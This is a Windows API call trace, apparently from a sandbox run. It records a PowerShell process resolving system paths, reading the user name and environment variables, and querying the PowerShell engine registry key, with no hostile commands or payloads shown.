	[0544.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0544.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.498] SetErrorMode (uMode=0x1) returned 0x1
	[0544.498] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0544.498] SetErrorMode (uMode=0x1) returned 0x1
	[0544.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.498] SetErrorMode (uMode=0x1) returned 0x1
	[0544.498] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0544.498] SetErrorMode (uMode=0x1) returned 0x1
	[0544.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.499] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0544.499] SetErrorMode (uMode=0x1) returned 0x1
	[0544.499] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0544.499] SetErrorMode (uMode=0x1) returned 0x1
	[0544.499] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0544.499] SetErrorMode (uMode=0x1) returned 0x1
	[0544.499] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0544.500] SetErrorMode (uMode=0x1) returned 0x1
	[0544.500] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0544.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ecb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0544.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.500] SetErrorMode (uMode=0x1) returned 0x1
	[0544.500] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0544.500] SetErrorMode (uMode=0x1) returned 0x1
	[0544.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.500] SetErrorMode (uMode=0x1) returned 0x1
	[0544.501] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0544.501] SetErrorMode (uMode=0x1) returned 0x1
	[0544.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ecb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1eced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.503] SetErrorMode (uMode=0x1) returned 0x1
	[0544.503] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed130 | out: lpFileInformation=0x1ed130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0544.503] SetErrorMode (uMode=0x1) returned 0x1
	[0544.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.658] CoTaskMemAlloc (cb=0x804) returned 0x1b708ae0
	[0545.658] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b708ae0, nSize=0x1ed498 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed498) returned 0x1
	[0546.585] CoTaskMemFree (pv=0x1b708ae0) 
	[0546.585] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0546.585] GetUserNameW (in: lpBuffer=0x3838e0, pcbBuffer=0x1ed4d8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed4d8) returned 1
	[0546.585] CoTaskMemFree (pv=0x3838e0) 
	[0546.587] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x36072f0*="Available", lpRawData=0x3607080) returned 1
	[0547.502] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0547.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.502] CoTaskMemFree (pv=0x1b6e49c0) 
	[0547.503] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0547.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.504] CoTaskMemFree (pv=0x1b6e49c0) 
	[0547.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.511] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0547.511] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0547.511] CoTaskMemFree (pv=0x1b6e49c0) 
	[0547.511] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0547.511] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0547.511] CoTaskMemFree (pv=0x1b6e49c0) 
	[0547.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.513] GetCurrentProcessId () returned 0xcd4
	[0547.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.518] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed4b8 | out: phkResult=0x1ed4b8*=0x38c) returned 0x0
	[0547.519] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed43c, lpData=0x0, lpcbData=0x1ed438*=0x0 | out: lpType=0x1ed43c*=0x1, lpData=0x0, lpcbData=0x1ed438*=0x56) returned 0x0
	[0547.519] CoTaskMemAlloc (cb=0x5a) returned 0x1b6e7a90
	[0547.519] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed40c, lpData=0x1b6e7a90, lpcbData=0x1ed408*=0x56 | out: lpType=0x1ed40c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed408*=0x56) returned 0x0
	[0547.519] CoTaskMemFree (pv=0x1b6e7a90) 
	[0547.519] RegCloseKey (hKey=0x38c) returned 0x0
	[0547.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.527] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0547.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.527] CoTaskMemFree (pv=0x1b6e49c0) 
	[0547.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
